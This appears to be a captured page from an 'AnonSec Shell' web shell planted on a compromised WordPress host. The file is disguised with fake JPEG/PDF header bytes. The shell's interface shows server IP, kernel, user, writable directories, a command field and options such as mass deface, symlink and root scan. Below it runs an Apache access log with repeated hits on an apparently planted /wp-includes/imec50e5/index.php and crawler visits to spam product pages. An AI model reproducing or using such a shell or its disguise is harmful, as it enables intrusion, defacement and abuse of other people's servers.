ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/access-logs/api.evidenciarevista.com.br
66.249.70.37 - - [17/Sep/2025:23:44:31 -0300] "GET /items/jvosh259/30596?key=consistent HTTP/1.1" 200 77415 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.208.18 - - [17/Sep/2025:23:47:39 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.10.229 Version/11.60"
204.12.208.18 - - [17/Sep/2025:23:47:19 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)"
69.197.149.50 - - [17/Sep/2025:23:49:10 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [17/Sep/2025:23:50:39 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [17/Sep/2025:23:52:12 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [17/Sep/2025:23:54:17 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [17/Sep/2025:23:56:30 -0300] "GET /products/270jv462 HTTP/1.1" 200 77739 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [17/Sep/2025:23:55:45 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [17/Sep/2025:23:57:19 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/159fk49305 HTTP/1.1" 200 78388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [17/Sep/2025:23:57:21 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:00:00:53 -0300] "GET /items/rwdch105/11660?key=intend HTTP/1.1" 200 77800 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.39 - - [18/Sep/2025:00:01:06 -0300] "GET /items/cfwih188/49843?key=suffer HTTP/1.1" 200 77493 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.208.18 - - [18/Sep/2025:00:01:41 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
204.12.208.18 - - [18/Sep/2025:00:01:21 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24"
66.249.70.37 - - [18/Sep/2025:00:04:12 -0300] "GET /products/286pv38850 HTTP/1.1" 200 77532 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:02:49 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:04:17 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:05:45 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:00:07:16 -0300] "GET /products/2bn24374 HTTP/1.1" 200 77101 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:07:15 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:08:44 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:10:13 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:11:43 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:00:13:25 -0300] "GET /products/220dy12062 HTTP/1.1" 200 78159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:13:11 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:14:57 -0300] "GET /products/194gl24226 HTTP/1.1" 200 77126 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:14:44 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:00:17:15 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
66.249.70.38 - - [18/Sep/2025:00:17:15 -0300] "GET /items/whbhd139/7830?key=concede HTTP/1.1" 200 77839 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:16:14 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:17:48 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:20:34 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/111vl15791 HTTP/1.1" 200 77578 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:19:24 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:00:21:06 -0300] "GET /products/1ps3173 HTTP/1.1" 200 77441 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:20:57 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:22:39 -0300] "GET /products/1eh12235 HTTP/1.1" 200 77249 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:22:26 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:23:53 -0300] "GET /products/236rf39378 HTTP/1.1" 200 77172 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:00:24:11 -0300] "GET /products/255rl45373 HTTP/1.1" 200 77529 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.37 - - [18/Sep/2025:00:24:18 -0300] "GET /products/18cz1318 HTTP/1.1" 200 77535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:23:58 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:00:25:43 -0300] "GET /products/270sj456 HTTP/1.1" 200 77293 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:25:31 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:28:07 -0300] "GET /products/185zz5283 HTTP/1.1" 200 78675 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:27:03 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:28:32 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:30:06 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:00:31:55 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2"
69.197.149.50 - - [18/Sep/2025:00:31:34 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:00:33:37 -0300] "GET /category/73/1 HTTP/1.1" 200 13021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:33:07 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:35:11 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:36:55 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:00:45:57 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
204.12.208.18 - - [18/Sep/2025:00:45:37 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24"
69.197.149.50 - - [18/Sep/2025:00:47:05 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:00:49:58 -0300] "GET /category/26_373_2964/1 HTTP/1.1" 200 12832 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:48:37 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:50:06 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:00:51:48 -0300] "GET /products/118vo38896 HTTP/1.1" 200 76867 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:51:40 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:53:09 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:00:55:09 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:00:56:53 -0300] "GET /products/221sj38993 HTTP/1.1" 200 77656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:56:42 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:00:58:11 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/233fv11299 HTTP/1.1" 200 77402 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:00:58:11 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:01:00:08 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
66.249.70.39 - - [18/Sep/2025:01:00:50 -0300] "GET /sitemap2.xml HTTP/1.1" 200 37288 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:00:59:44 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:01:13 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:01:02:44 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/233fv11299 HTTP/1.1" 200 77533 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:02:44 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:04:13 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:06:29 -0300] "GET /products/286em1880 HTTP/1.1" 200 77334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:05:42 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:07:54 -0300] "GET /products/187vs49871 HTTP/1.1" 200 77188 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:07:19 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:08:47 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:10:15 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
